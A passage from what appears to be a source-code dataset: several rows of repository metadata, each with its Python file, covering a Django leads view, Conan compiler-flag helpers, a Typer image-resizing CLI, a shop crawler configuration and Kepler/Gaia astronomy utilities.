return render(request, template_name="leads/lead_details.html", context=context)
def lead_create(request):
form = LeadModelForm()
if request.method == "POST":
form = LeadModelForm(request.POST)
if form.is_valid():
form.save()
return redirect("/leads")
context = {"form": form}
return render(request, template_name="leads/lead_create.html", context=context)
# The newest implementation supporting model forms
def lead_update(request, pk):
lead = Lead.objects.get(pk=pk)
form = LeadModelForm(instance=lead)
if request.method == "POST":
form = LeadModelForm(request.POST)
if form.is_valid():
form.save()
return redirect("/leads")
context = {"form": form, "lead": lead}
return render(request, template_name="leads/lead_update.html", context=context)
def lead_delete(request, pk):
lead = Lead.objects.get(pk=pk)
# delete the model object directly without doing template action
lead.delete()
return redirect("/leads")
| 1,012 | 156 | 137 |
8a483fb637700edab7aeb2e9ef5a798fec2e6a39 | 5,156 | py | Python | conans/client/build/compiler_flags.py | rukgar/conan | 02e0e1718da20d67348761fe24a39110f70b1664 | [
"MIT"
] | null | null | null | conans/client/build/compiler_flags.py | rukgar/conan | 02e0e1718da20d67348761fe24a39110f70b1664 | [
"MIT"
] | null | null | null | conans/client/build/compiler_flags.py | rukgar/conan | 02e0e1718da20d67348761fe24a39110f70b1664 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
# Visual Studio cl options reference:
# https://msdn.microsoft.com/en-us/library/610ecb4h.aspx
# "Options are specified by either a forward slash (/) or a dash (–)."
# Here we use "-" better than "/" that produces invalid escaped chars using AutoTools.
# -LIBPATH, -D, -I, -ZI and so on.
"""
from conans.tools import unix_path
def architecture_flag(compiler, arch):
"""
returns flags specific to the target architecture and compiler
"""
if not compiler or not arch:
return ""
if str(compiler) in ['gcc', 'apple-clang', 'clang', 'sun-cc']:
if str(arch) in ['x86_64', 'sparcv9']:
return '-m64'
elif str(arch) in ['x86', 'sparc']:
return '-m32'
return ""
def libcxx_flag(compiler, libcxx):
"""
returns flag specific to the target C++ standard library
"""
if not compiler or not libcxx:
return ""
if str(compiler) in ['clang', 'apple-clang']:
if str(libcxx) in ['libstdc++', 'libstdc++11']:
return '-stdlib=libstdc++'
elif str(libcxx) == 'libc++':
return '-stdlib=libc++'
elif str(compiler) == 'sun-cc':
return ({"libCstd": "-library=Cstd",
"libstdcxx": "-library=stdcxx4",
"libstlport": "-library=stlport4",
"libstdc++": "-library=stdcpp"}.get(libcxx, ""))
return ""
def pic_flag(compiler=None):
"""
returns PIC (position independent code) flags, such as -fPIC
"""
if not compiler or compiler == 'Visual Studio':
return ""
return '-fPIC'
def build_type_flag(compiler, build_type):
"""
returns flags specific to the build type (Debug, Release, etc.)
(-s, -g, /Zi, etc.)
"""
if not compiler or not build_type:
return ""
if str(compiler) == 'Visual Studio':
if build_type == 'Debug':
return '-Zi'
else:
if build_type == 'Debug':
return '-g'
elif build_type == 'Release' and str(compiler) == 'gcc':
return '-s'
return ""
def build_type_define(build_type=None):
"""
returns definitions specific to the build type (Debug, Release, etc.)
like DEBUG, _DEBUG, NDEBUG
"""
return 'NDEBUG' if build_type == 'Release' else ""
def adjust_path(path, win_bash=False, subsystem=None, compiler=None):
"""
adjusts path to be safely passed to the compiler command line
for Windows bash, ensures path is in format according to the subsystem
for path with spaces, places double quotes around it
converts slashes to backslashes, or vice versa
"""
if str(compiler) == 'Visual Studio':
path = path.replace('/', '\\')
else:
path = path.replace('\\', '/')
if win_bash:
path = unix_path(path, subsystem)
return '"%s"' % path if ' ' in path else path
include_path_option = "-I"
visual_linker_option_separator = "-link" # Further options will apply to the linker
| 31.82716 | 97 | 0.604926 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
# Visual Studio cl options reference:
# https://msdn.microsoft.com/en-us/library/610ecb4h.aspx
# "Options are specified by either a forward slash (/) or a dash (–)."
# Here we use "-" better than "/" that produces invalid escaped chars using AutoTools.
# -LIBPATH, -D, -I, -ZI and so on.
"""
from conans.tools import unix_path
def rpath_flags(os_build, compiler, lib_paths):
if not os_build:
return []
if compiler in ("clang", "apple-clang", "gcc"):
rpath_separator = "," if os_build in ["Macos", "iOS", "watchOS", "tvOS"] else "="
return ['-Wl,-rpath%s"%s"' % (rpath_separator, x.replace("\\", "/"))
for x in lib_paths if x]
return []
def architecture_flag(compiler, arch):
"""
returns flags specific to the target architecture and compiler
"""
if not compiler or not arch:
return ""
if str(compiler) in ['gcc', 'apple-clang', 'clang', 'sun-cc']:
if str(arch) in ['x86_64', 'sparcv9']:
return '-m64'
elif str(arch) in ['x86', 'sparc']:
return '-m32'
return ""
def libcxx_define(compiler, libcxx):
if not compiler or not libcxx:
return ""
if str(compiler) in ['gcc', 'clang', 'apple-clang']:
if str(libcxx) == 'libstdc++':
return '_GLIBCXX_USE_CXX11_ABI=0'
elif str(libcxx) == 'libstdc++11':
return '_GLIBCXX_USE_CXX11_ABI=1'
return ""
def libcxx_flag(compiler, libcxx):
"""
returns flag specific to the target C++ standard library
"""
if not compiler or not libcxx:
return ""
if str(compiler) in ['clang', 'apple-clang']:
if str(libcxx) in ['libstdc++', 'libstdc++11']:
return '-stdlib=libstdc++'
elif str(libcxx) == 'libc++':
return '-stdlib=libc++'
elif str(compiler) == 'sun-cc':
return ({"libCstd": "-library=Cstd",
"libstdcxx": "-library=stdcxx4",
"libstlport": "-library=stlport4",
"libstdc++": "-library=stdcpp"}.get(libcxx, ""))
return ""
def pic_flag(compiler=None):
"""
returns PIC (position independent code) flags, such as -fPIC
"""
if not compiler or compiler == 'Visual Studio':
return ""
return '-fPIC'
def build_type_flag(compiler, build_type):
"""
returns flags specific to the build type (Debug, Release, etc.)
(-s, -g, /Zi, etc.)
"""
if not compiler or not build_type:
return ""
if str(compiler) == 'Visual Studio':
if build_type == 'Debug':
return '-Zi'
else:
if build_type == 'Debug':
return '-g'
elif build_type == 'Release' and str(compiler) == 'gcc':
return '-s'
return ""
def build_type_define(build_type=None):
"""
returns definitions specific to the build type (Debug, Release, etc.)
like DEBUG, _DEBUG, NDEBUG
"""
return 'NDEBUG' if build_type == 'Release' else ""
def adjust_path(path, win_bash=False, subsystem=None, compiler=None):
"""
adjusts path to be safely passed to the compiler command line
for Windows bash, ensures path is in format according to the subsystem
for path with spaces, places double quotes around it
converts slashes to backslashes, or vice versa
"""
if str(compiler) == 'Visual Studio':
path = path.replace('/', '\\')
else:
path = path.replace('\\', '/')
if win_bash:
path = unix_path(path, subsystem)
return '"%s"' % path if ' ' in path else path
def sysroot_flag(sysroot, win_bash=False, subsystem=None, compiler=None):
if str(compiler) != 'Visual Studio' and sysroot:
sysroot = adjust_path(sysroot, win_bash=win_bash, subsystem=subsystem, compiler=compiler)
return '--sysroot=%s' % sysroot
return ""
def visual_runtime(runtime):
if runtime:
return "-%s" % runtime
return ""
def format_defines(defines, compiler):
return ["-D%s" % define for define in defines if define]
include_path_option = "-I"
visual_linker_option_separator = "-link" # Further options will apply to the linker
def format_include_paths(include_paths, win_bash=False, subsystem=None, compiler=None):
return ["%s%s" % (include_path_option, adjust_path(include_path, win_bash=win_bash,
subsystem=subsystem, compiler=compiler))
for include_path in include_paths if include_path]
def format_library_paths(library_paths, win_bash=False, subsystem=None, compiler=None):
pattern = "-LIBPATH:%s" if str(compiler) == 'Visual Studio' else "-L%s"
return [pattern % adjust_path(library_path, win_bash=win_bash,
subsystem=subsystem, compiler=compiler)
for library_path in library_paths if library_path]
def format_libraries(libraries, compiler=None):
pattern = "%s.lib" if str(compiler) == 'Visual Studio' else "-l%s"
return [pattern % library for library in libraries if library]
| 1,880 | 0 | 184 |
eda29fae963113bfc8359413b963e765ffb35012 | 3,392 | py | Python | make_responsive_images/main.py | mccarthysean/responsive-images-generator | 3973bf3de69eaff43e6fbf010190626c2eaae2a8 | [
"MIT"
] | null | null | null | make_responsive_images/main.py | mccarthysean/responsive-images-generator | 3973bf3de69eaff43e6fbf010190626c2eaae2a8 | [
"MIT"
] | null | null | null | make_responsive_images/main.py | mccarthysean/responsive-images-generator | 3973bf3de69eaff43e6fbf010190626c2eaae2a8 | [
"MIT"
] | null | null | null | import logging
from pathlib import Path
from typing import Optional
import typer
from . import __app_name__, __version__
from .utils import make_html, resize_image
app = typer.Typer()
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
@app.callback()
@app.command()
def image(
image: str = typer.Argument(
str(
Path(__file__)
.parent.parent.joinpath("tests")
.joinpath("fixtures")
.joinpath("xfer-original.jpg")
),
help="Image file location",
),
widths: str = typer.Option("600,1000,1400", help="Widths of new images, in pixels"),
html: bool = typer.Option(True, help="Generate HTML <img> tag"),
classes: str = typer.Option(
None, help='Classnames to add to the <img> tag (e.g. class="img-fluid")'
),
img_sizes: str = typer.Option(
"100vw", help='Sizes for the <img> tag (e.g. sizes="100vw")'
),
lazy: bool = typer.Option(False, help='Adds loading="lazy" to <img> tag for SEO'),
alt: str = typer.Option(
"", help='Adds alt="" to the <img> tag (e.g. alt="Funny image")'
),
dir: str = typer.Option(
None, help='Images directory to prepend to the src (e.g. src="dir/images")'
),
fmt: str = typer.Option(
"webp", help='Image type to save as ("jpg" and "webp" supported)'
),
qual: int = typer.Option(100, help="Compression to apply (i.e. 0=max, 100=min)"),
lower: bool = typer.Option(True, help="Converts filename to lowercase"),
dashes: bool = typer.Option(True, help="Converts underscores to dashes for SEO"),
flask: bool = typer.Option(
False, help="Uses Python Flask's 'url_for('static', ...)'"
),
) -> None:
"""Resize one image"""
typer.secho(f"Image: {image}", fg=typer.colors.GREEN)
typer.echo(f"Widths needed: {widths}")
typer.echo(f"HTML wanted: {html}")
typer.echo(f"Classes wanted: {classes}")
typer.echo(f"Image sizes wanted: {img_sizes}")
typer.echo(f"Lazy loading wanted: {lazy}")
typer.echo(f"Alt text wanted: {alt}")
typer.echo(f"Directory to append: {dir}")
typer.echo(f"Image format wanted: {fmt}")
typer.echo(f"Quality/compression wanted: {qual}")
typer.echo(f"Lowercase filename wanted: {lower}")
typer.echo(f"Dashes wanted: {dashes}")
typer.echo(f"Flask url_for() wanted: {flask}")
widths_split = widths.split(",")
widths_list = [int(width) for width in widths_split]
file = Path(image)
filenames = resize_image(
file=file,
widths=widths_list,
fmt=fmt,
qual=qual,
lower=lower,
dashes=dashes,
)
typer.echo(f"filenames: {filenames}")
if html:
make_html(
orig_img_file=file,
filenames=filenames,
classes=classes,
img_sizes=img_sizes,
lazy=lazy,
alt=alt,
dir=dir,
flask=flask,
)
| 29.754386 | 88 | 0.600825 | import logging
from pathlib import Path
from typing import Optional
import typer
from . import __app_name__, __version__
from .utils import make_html, resize_image
app = typer.Typer()
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def _version_callback(value: bool) -> None:
if value:
typer.echo(f"{__app_name__} v{__version__}")
raise typer.Exit()
@app.callback()
def main(
version: Optional[bool] = typer.Option(
None,
"--version",
"-v",
help="Show the application's version and exit.",
callback=_version_callback,
is_eager=True,
)
) -> bool:
if version:
return True
return False
@app.command()
def image(
image: str = typer.Argument(
str(
Path(__file__)
.parent.parent.joinpath("tests")
.joinpath("fixtures")
.joinpath("xfer-original.jpg")
),
help="Image file location",
),
widths: str = typer.Option("600,1000,1400", help="Widths of new images, in pixels"),
html: bool = typer.Option(True, help="Generate HTML <img> tag"),
classes: str = typer.Option(
None, help='Classnames to add to the <img> tag (e.g. class="img-fluid")'
),
img_sizes: str = typer.Option(
"100vw", help='Sizes for the <img> tag (e.g. sizes="100vw")'
),
lazy: bool = typer.Option(False, help='Adds loading="lazy" to <img> tag for SEO'),
alt: str = typer.Option(
"", help='Adds alt="" to the <img> tag (e.g. alt="Funny image")'
),
dir: str = typer.Option(
None, help='Images directory to prepend to the src (e.g. src="dir/images")'
),
fmt: str = typer.Option(
"webp", help='Image type to save as ("jpg" and "webp" supported)'
),
qual: int = typer.Option(100, help="Compression to apply (i.e. 0=max, 100=min)"),
lower: bool = typer.Option(True, help="Converts filename to lowercase"),
dashes: bool = typer.Option(True, help="Converts underscores to dashes for SEO"),
flask: bool = typer.Option(
False, help="Uses Python Flask's 'url_for('static', ...)'"
),
) -> None:
"""Resize one image"""
typer.secho(f"Image: {image}", fg=typer.colors.GREEN)
typer.echo(f"Widths needed: {widths}")
typer.echo(f"HTML wanted: {html}")
typer.echo(f"Classes wanted: {classes}")
typer.echo(f"Image sizes wanted: {img_sizes}")
typer.echo(f"Lazy loading wanted: {lazy}")
typer.echo(f"Alt text wanted: {alt}")
typer.echo(f"Directory to append: {dir}")
typer.echo(f"Image format wanted: {fmt}")
typer.echo(f"Quality/compression wanted: {qual}")
typer.echo(f"Lowercase filename wanted: {lower}")
typer.echo(f"Dashes wanted: {dashes}")
typer.echo(f"Flask url_for() wanted: {flask}")
widths_split = widths.split(",")
widths_list = [int(width) for width in widths_split]
file = Path(image)
filenames = resize_image(
file=file,
widths=widths_list,
fmt=fmt,
qual=qual,
lower=lower,
dashes=dashes,
)
typer.echo(f"filenames: {filenames}")
if html:
make_html(
orig_img_file=file,
filenames=filenames,
classes=classes,
img_sizes=img_sizes,
lazy=lazy,
alt=alt,
dir=dir,
flask=flask,
)
| 383 | 0 | 45 |
d39c831d0e173af80cda2346e3fcde70b0552897 | 489 | py | Python | service/impl/epoca_cosmeticos.py | ralphavalon/avaloncrawler | 1da60d3f463f1ce8e4422604bc59a86b72e60586 | [
"MIT"
] | null | null | null | service/impl/epoca_cosmeticos.py | ralphavalon/avaloncrawler | 1da60d3f463f1ce8e4422604bc59a86b72e60586 | [
"MIT"
] | null | null | null | service/impl/epoca_cosmeticos.py | ralphavalon/avaloncrawler | 1da60d3f463f1ce8e4422604bc59a86b72e60586 | [
"MIT"
] | null | null | null | # coding: utf-8
import os
from ..crawlable import Crawlable | 23.285714 | 62 | 0.640082 | # coding: utf-8
import os
from ..crawlable import Crawlable
class EpocaCosmeticos(Crawlable):
def get_crawlable_name(self):
return 'EpocaCosmeticos'
def get_category_pages(self):
return '//div[@class="menu"]//a/@href'
def get_product_pages(self):
return '.*/p$'
def get_home_page(self):
return 'http://www.epocacosmeticos.com.br/'
def get_product_name(self):
return '//div[contains(@class, "productName")]/text()' | 250 | 12 | 166 |
3c6cfb957e3b92b337bc0d431ffb2ddfe0667ac7 | 12,108 | py | Python | src/kepler_apertures/utils.py | jorgemarpa/kepler-apertures | a9a3842016a05a57e79fd47338bef0aa354bb148 | [
"MIT"
] | null | null | null | src/kepler_apertures/utils.py | jorgemarpa/kepler-apertures | a9a3842016a05a57e79fd47338bef0aa354bb148 | [
"MIT"
] | null | null | null | src/kepler_apertures/utils.py | jorgemarpa/kepler-apertures | a9a3842016a05a57e79fd47338bef0aa354bb148 | [
"MIT"
] | null | null | null | """
Collection of utility functions
"""
import numpy as np
import functools
from scipy import sparse
from patsy import dmatrix
from tqdm import tqdm
import pyia
import matplotlib.pyplot as plt
from astropy import units
from astropy.time import Time
from astropy.timeseries import BoxLeastSquares
@functools.lru_cache()
def get_gaia_sources(ras, decs, rads, magnitude_limit=18, epoch=2020, dr=2):
"""
Will find gaia sources using a TAP query, accounting for proper motions.
Inputs have be hashable, e.g. tuples
Parameters
----------
ras : tuple
Tuple with right ascension coordinates to be queried
shape nsources
decs : tuple
Tuple with declination coordinates to be queried
shape nsources
rads : tuple
Tuple with radius query
shape nsources
magnitude_limit : int
Limiting magnitued for query
epoch : float
Year of the observation (Julian year) used for proper motion correction.
dr : int
Gaia Data Release to be used, DR2 or EDR3.
Returns
-------
Pandas DatFrame with number of result sources (rows) and Gaia columns
"""
if not hasattr(ras, "__iter__"):
ras = [ras]
if not hasattr(decs, "__iter__"):
decs = [decs]
if not hasattr(rads, "__iter__"):
rads = [rads]
wheres = [
f"""1=CONTAINS(
POINT('ICRS',ra,dec),
CIRCLE('ICRS',{ra},{dec},{rad}))"""
for ra, dec, rad in zip(ras, decs, rads)
]
where = """\n\tOR """.join(wheres)
if dr == 2:
# CH: We don't need a lot of these columns we could greatly reduce it
gd = pyia.GaiaData.from_query(
f"""SELECT solution_id, designation, source_id, random_index, ref_epoch,
coord1(prop) AS ra, ra_error, coord2(prop) AS dec, dec_error, parallax,
parallax_error, parallax_over_error, pmra, pmra_error, pmdec, pmdec_error,
ra_dec_corr, ra_parallax_corr, ra_pmra_corr, ra_pmdec_corr, dec_parallax_corr,
dec_pmra_corr, dec_pmdec_corr, parallax_pmra_corr, parallax_pmdec_corr,
pmra_pmdec_corr, astrometric_n_obs_al, astrometric_n_obs_ac,
astrometric_n_good_obs_al, astrometric_n_bad_obs_al, astrometric_gof_al,
astrometric_chi2_al, astrometric_excess_noise, astrometric_excess_noise_sig,
astrometric_params_solved, astrometric_primary_flag, astrometric_weight_al,
astrometric_pseudo_colour, astrometric_pseudo_colour_error,
mean_varpi_factor_al, astrometric_matched_observations,
visibility_periods_used, astrometric_sigma5d_max, frame_rotator_object_type,
matched_observations, duplicated_source, phot_g_n_obs, phot_g_mean_flux,
phot_g_mean_flux_error, phot_g_mean_flux_over_error, phot_g_mean_mag,
phot_bp_n_obs, phot_bp_mean_flux, phot_bp_mean_flux_error,
phot_bp_mean_flux_over_error, phot_bp_mean_mag, phot_rp_n_obs,
phot_rp_mean_flux, phot_rp_mean_flux_error, phot_rp_mean_flux_over_error,
phot_rp_mean_mag, phot_bp_rp_excess_factor, phot_proc_mode, bp_rp, bp_g, g_rp,
radial_velocity, radial_velocity_error, rv_nb_transits, rv_template_teff,
rv_template_logg, rv_template_fe_h, phot_variable_flag, l, b, ecl_lon, ecl_lat,
priam_flags, teff_val, teff_percentile_lower, teff_percentile_upper, a_g_val,
a_g_percentile_lower, a_g_percentile_upper, e_bp_min_rp_val,
e_bp_min_rp_percentile_lower, e_bp_min_rp_percentile_upper, flame_flags,
radius_val, radius_percentile_lower, radius_percentile_upper, lum_val,
lum_percentile_lower, lum_percentile_upper, datalink_url, epoch_photometry_url,
ra as ra_gaia, dec as dec_gaia FROM (
SELECT *,
EPOCH_PROP_POS(ra, dec, parallax, pmra, pmdec, 0, ref_epoch, {epoch}) AS prop
FROM gaiadr2.gaia_source
WHERE {where}
) AS subquery
WHERE phot_g_mean_mag<={magnitude_limit}
"""
)
elif dr == 3:
gd = pyia.GaiaData.from_query(
f"""SELECT designation,
coord1(prop) AS ra, ra_error, coord2(prop) AS dec, dec_error,
parallax, parallax_error, pmra, pmra_error, pmdec, pmdec_error,
dr2_radial_velocity, dr2_radial_velocity_error,
ruwe, phot_g_n_obs, phot_g_mean_flux,
phot_g_mean_flux_error, phot_g_mean_mag,
phot_bp_n_obs, phot_bp_mean_flux, phot_bp_mean_flux_error,
phot_bp_mean_mag, phot_rp_n_obs,
phot_rp_mean_flux, phot_rp_mean_flux_error,
phot_rp_mean_mag FROM (
SELECT *,
EPOCH_PROP_POS(ra, dec, parallax, pmra, pmdec, 0, ref_epoch, {epoch}) AS prop
FROM gaiaedr3.gaia_source
WHERE {where}
) AS subquery
WHERE phot_g_mean_mag<={magnitude_limit}
"""
)
else:
raise ValueError("Please pass a valid data release")
return gd.data.to_pandas()
def make_A_edges(r, f, type="quadratic"):
"""
Creates a design matrix to estimate the PSF edge (in pixels) as a function of the
flux.
Parameters
----------
r : numpy ndarray
Array with radii values
f : numpy ndarray
Array with flux values
type: string
Type of basis for the design matrix, default is quadratic in both
radius and flux
Returns
-------
A : numpy ndarray
A design matrix
"""
if type == "linear":
A = np.vstack([r ** 0, r, f]).T
elif type == "r-quadratic":
A = np.vstack([r ** 0, r, r ** 2, f]).T
elif type == "cubic":
A = np.vstack([r ** 0, r, r ** 2, r ** 3, f]).T
elif type == "exp":
A = np.vstack([r ** 0, np.exp(-r), f]).T
elif type == "inverse":
A = np.vstack([r ** 0, 1 / r, f]).T
elif type == "rf-quadratic":
A = np.vstack(
[
r ** 0,
r,
r ** 2,
r ** 0 * f,
r * f,
r ** 2 * f,
r ** 0 * f ** 2,
r * f ** 2,
r ** 2 * f ** 2,
]
).T
else:
raise ValueError("Wrong desing matrix basis type")
return A
def solve_linear_model(
A, y, y_err=None, prior_mu=None, prior_sigma=None, k=None, errors=False
):
"""
Solves a linear model with design matrix A and observations y:
Aw = y
return the solutions w for the system assuming Gaussian priors.
Alternatively the observation errors, priors, and a boolean mask for the
observations (row axis) can be provided.
Adapted from Luger, Foreman-Mackey & Hogg, 2017
(https://ui.adsabs.harvard.edu/abs/2017RNAAS...1....7L/abstract)
Parameters
----------
A : numpy ndarray or scipy sparce csr matrix
Desging matrix with solution basis
shape n_observations x n_basis
y : numpy ndarray
Observations
shape n_observations
y_err : numpy ndarray, optional
Observation errors
shape n_observations
prior_mu : float, optional
Mean of Gaussian prior values for the weights (w)
prior_sigma : float, optional
Standard deviation of Gaussian prior values for the weights (w)
k : boolean, numpy ndarray, optional
Mask that sets the observations to be used to solve the system
shape n_observations
Returns
-------
w : numpy ndarray
Array with the estimations for the weights
shape n_basis
werrs : numpy ndarray
Array with the error estimations for the weights, returned if y_err is
provided
shape n_basis
"""
if k is None:
k = np.ones(len(y), dtype=bool)
if y_err is not None:
sigma_w_inv = A[k].T.dot(A[k].multiply(1 / y_err[k, None] ** 2))
B = A[k].T.dot((y[k] / y_err[k] ** 2))
else:
sigma_w_inv = A[k].T.dot(A[k])
B = A[k].T.dot(y[k])
if prior_mu is not None and prior_sigma is not None:
sigma_w_inv += np.diag(1 / prior_sigma ** 2)
B += prior_mu / prior_sigma ** 2
if type(sigma_w_inv) == sparse.csr_matrix:
sigma_w_inv = sigma_w_inv.toarray()
if type(sigma_w_inv) == sparse.csc_matrix:
sigma_w_inv = sigma_w_inv.toarray()
if type(sigma_w_inv) == np.matrix:
sigma_w_inv = np.asarray(sigma_w_inv)
w = np.linalg.solve(sigma_w_inv, B)
if errors is True:
w_err = np.linalg.inv(sigma_w_inv).diagonal() ** 0.5
return w, w_err
return w
def _make_A_polar(phi, r, cut_r=1.5, rmin=1, rmax=5, n_r_knots=12, n_phi_knots=15):
"""
Makes a spline design matrix in polar coordinates
Parameters
----------
phi : numpy ndarray
r : numpy ndarray
cut_r : int
rmin : float
Minimum radius value for the array of knots
rmax : float
Maximum radius value for the array of knots
n_r_knots : int
Number of knots to used for the radius axis
n_phi_knots : int
Number of knots to used for the angle axis
Returns
-------
x1 : sparse matrix
Design matrix in polar coordinates using spline as base functions
"""
# create the spline bases for radius and angle
phi_spline = sparse.csr_matrix(wrapped_spline(phi, order=3, nknots=n_phi_knots).T)
r_knots = np.linspace(rmin ** 0.5, rmax ** 0.5, n_r_knots) ** 2
cut_r_int = np.where(r_knots <= cut_r)[0].max()
r_spline = sparse.csr_matrix(
np.asarray(
dmatrix(
"bs(x, knots=knots, degree=3, include_intercept=True)",
{"x": list(r), "knots": r_knots},
)
)
)
# build full desing matrix
X = sparse.hstack(
[phi_spline.multiply(r_spline[:, idx]) for idx in range(r_spline.shape[1])],
format="csr",
)
# find and remove the angle dependency for all basis for radius < 6
cut = np.arange(0, phi_spline.shape[1] * cut_r_int)
a = list(set(np.arange(X.shape[1])) - set(cut))
X1 = sparse.hstack(
[X[:, a], r_spline[:, 1:cut_r_int], sparse.csr_matrix(np.ones(X.shape[0])).T],
format="csr",
)
return X1
def wrapped_spline(input_vector, order=2, nknots=10):
"""
Creates a vector of folded-spline basis according to the input data. This is meant
to be used to build the basis vectors for periodic data, like the angle in polar
coordinates.
Parameters
----------
input_vector : numpy.ndarray
Input data to create basis, angle values MUST BE BETWEEN -PI and PI.
order : int
Order of the spline basis
nknots : int
Number of knots for the splines
Returns
-------
folded_basis : numpy.ndarray
Array of folded-spline basis
"""
if not ((input_vector > -np.pi) & (input_vector < np.pi)).all():
raise ValueError("Must be between -pi and pi")
x = np.copy(input_vector)
x1 = np.hstack([x, x + np.pi * 2])
nt = (nknots * 2) + 1
t = np.linspace(-np.pi, 3 * np.pi, nt)
dt = np.median(np.diff(t))
# Zeroth order basis
basis = np.asarray(
[
((x1 >= t[idx]) & (x1 < t[idx + 1])).astype(float)
for idx in range(len(t) - 1)
]
)
# Higher order basis
for order in np.arange(1, 4):
basis_1 = []
for idx in range(len(t) - 1):
a = ((x1 - t[idx]) / (dt * order)) * basis[idx]
if ((idx + order + 1)) < (nt - 1):
b = (-(x1 - t[(idx + order + 1)]) / (dt * order)) * basis[
(idx + 1) % (nt - 1)
]
else:
b = np.zeros(len(x1))
basis_1.append(a + b)
basis = np.vstack(basis_1)
folded_basis = np.copy(basis)[: nt // 2, : len(x)]
for idx in np.arange(-order, 0):
folded_basis[idx, :] += np.copy(basis)[nt // 2 + idx, len(x) :]
return folded_basis
| 34.594286 | 91 | 0.604972 | """
Collection of utility functions
"""
import numpy as np
import functools
from scipy import sparse
from patsy import dmatrix
from tqdm import tqdm
import pyia
import matplotlib.pyplot as plt
from astropy import units
from astropy.time import Time
from astropy.timeseries import BoxLeastSquares
@functools.lru_cache()
def get_gaia_sources(ras, decs, rads, magnitude_limit=18, epoch=2020, dr=2):
"""
Will find gaia sources using a TAP query, accounting for proper motions.
Inputs have be hashable, e.g. tuples
Parameters
----------
ras : tuple
Tuple with right ascension coordinates to be queried
shape nsources
decs : tuple
Tuple with declination coordinates to be queried
shape nsources
rads : tuple
Tuple with radius query
shape nsources
magnitude_limit : int
Limiting magnitued for query
epoch : float
Year of the observation (Julian year) used for proper motion correction.
dr : int
Gaia Data Release to be used, DR2 or EDR3.
Returns
-------
Pandas DatFrame with number of result sources (rows) and Gaia columns
"""
if not hasattr(ras, "__iter__"):
ras = [ras]
if not hasattr(decs, "__iter__"):
decs = [decs]
if not hasattr(rads, "__iter__"):
rads = [rads]
wheres = [
f"""1=CONTAINS(
POINT('ICRS',ra,dec),
CIRCLE('ICRS',{ra},{dec},{rad}))"""
for ra, dec, rad in zip(ras, decs, rads)
]
where = """\n\tOR """.join(wheres)
if dr == 2:
# CH: We don't need a lot of these columns we could greatly reduce it
gd = pyia.GaiaData.from_query(
f"""SELECT solution_id, designation, source_id, random_index, ref_epoch,
coord1(prop) AS ra, ra_error, coord2(prop) AS dec, dec_error, parallax,
parallax_error, parallax_over_error, pmra, pmra_error, pmdec, pmdec_error,
ra_dec_corr, ra_parallax_corr, ra_pmra_corr, ra_pmdec_corr, dec_parallax_corr,
dec_pmra_corr, dec_pmdec_corr, parallax_pmra_corr, parallax_pmdec_corr,
pmra_pmdec_corr, astrometric_n_obs_al, astrometric_n_obs_ac,
astrometric_n_good_obs_al, astrometric_n_bad_obs_al, astrometric_gof_al,
astrometric_chi2_al, astrometric_excess_noise, astrometric_excess_noise_sig,
astrometric_params_solved, astrometric_primary_flag, astrometric_weight_al,
astrometric_pseudo_colour, astrometric_pseudo_colour_error,
mean_varpi_factor_al, astrometric_matched_observations,
visibility_periods_used, astrometric_sigma5d_max, frame_rotator_object_type,
matched_observations, duplicated_source, phot_g_n_obs, phot_g_mean_flux,
phot_g_mean_flux_error, phot_g_mean_flux_over_error, phot_g_mean_mag,
phot_bp_n_obs, phot_bp_mean_flux, phot_bp_mean_flux_error,
phot_bp_mean_flux_over_error, phot_bp_mean_mag, phot_rp_n_obs,
phot_rp_mean_flux, phot_rp_mean_flux_error, phot_rp_mean_flux_over_error,
phot_rp_mean_mag, phot_bp_rp_excess_factor, phot_proc_mode, bp_rp, bp_g, g_rp,
radial_velocity, radial_velocity_error, rv_nb_transits, rv_template_teff,
rv_template_logg, rv_template_fe_h, phot_variable_flag, l, b, ecl_lon, ecl_lat,
priam_flags, teff_val, teff_percentile_lower, teff_percentile_upper, a_g_val,
a_g_percentile_lower, a_g_percentile_upper, e_bp_min_rp_val,
e_bp_min_rp_percentile_lower, e_bp_min_rp_percentile_upper, flame_flags,
radius_val, radius_percentile_lower, radius_percentile_upper, lum_val,
lum_percentile_lower, lum_percentile_upper, datalink_url, epoch_photometry_url,
ra as ra_gaia, dec as dec_gaia FROM (
SELECT *,
EPOCH_PROP_POS(ra, dec, parallax, pmra, pmdec, 0, ref_epoch, {epoch}) AS prop
FROM gaiadr2.gaia_source
WHERE {where}
) AS subquery
WHERE phot_g_mean_mag<={magnitude_limit}
"""
)
elif dr == 3:
gd = pyia.GaiaData.from_query(
f"""SELECT designation,
coord1(prop) AS ra, ra_error, coord2(prop) AS dec, dec_error,
parallax, parallax_error, pmra, pmra_error, pmdec, pmdec_error,
dr2_radial_velocity, dr2_radial_velocity_error,
ruwe, phot_g_n_obs, phot_g_mean_flux,
phot_g_mean_flux_error, phot_g_mean_mag,
phot_bp_n_obs, phot_bp_mean_flux, phot_bp_mean_flux_error,
phot_bp_mean_mag, phot_rp_n_obs,
phot_rp_mean_flux, phot_rp_mean_flux_error,
phot_rp_mean_mag FROM (
SELECT *,
EPOCH_PROP_POS(ra, dec, parallax, pmra, pmdec, 0, ref_epoch, {epoch}) AS prop
FROM gaiaedr3.gaia_source
WHERE {where}
) AS subquery
WHERE phot_g_mean_mag<={magnitude_limit}
"""
)
else:
raise ValueError("Please pass a valid data release")
return gd.data.to_pandas()
def make_A_edges(r, f, type="quadratic"):
"""
Creates a design matrix to estimate the PSF edge (in pixels) as a function of the
flux.
Parameters
----------
r : numpy ndarray
Array with radii values
f : numpy ndarray
Array with flux values
type: string
Type of basis for the design matrix, default is quadratic in both
radius and flux
Returns
-------
A : numpy ndarray
A design matrix
"""
if type == "linear":
A = np.vstack([r ** 0, r, f]).T
elif type == "r-quadratic":
A = np.vstack([r ** 0, r, r ** 2, f]).T
elif type == "cubic":
A = np.vstack([r ** 0, r, r ** 2, r ** 3, f]).T
elif type == "exp":
A = np.vstack([r ** 0, np.exp(-r), f]).T
elif type == "inverse":
A = np.vstack([r ** 0, 1 / r, f]).T
elif type == "rf-quadratic":
A = np.vstack(
[
r ** 0,
r,
r ** 2,
r ** 0 * f,
r * f,
r ** 2 * f,
r ** 0 * f ** 2,
r * f ** 2,
r ** 2 * f ** 2,
]
).T
else:
raise ValueError("Wrong desing matrix basis type")
